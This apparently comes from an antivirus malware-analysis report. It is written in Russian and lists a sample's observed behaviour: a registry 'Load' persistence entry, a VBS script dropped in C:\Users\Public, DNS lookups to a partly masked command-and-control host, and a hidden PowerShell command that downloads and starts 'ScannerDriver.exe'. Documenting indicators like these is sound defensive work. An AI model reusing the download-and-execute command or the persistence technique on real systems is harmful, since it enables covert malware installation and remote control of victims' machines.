Техническая информация
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = 'C:\Users\Public\config.vbs'
- '<SYSTEM32>\wscript.exe' C:\Users\Public\config.vbs
- http://po#.##wielab.com/c2/agent/20170703142328 как scannerdriver.exe
- C:\users\public\config.txt
- C:\users\public\config.vbs
- C:\users\public\config.txt в C:\users\public\config.vbs
- 'po#.##wielab.com':80
- DNS ASK po#.##wielab.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep Bypass -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadFile('http://po#.##wielab.com/C2/Agent/20170703142328','ScannerDriver.exe'));Start-Process 'ScannerDriver....' (со скрытым окном)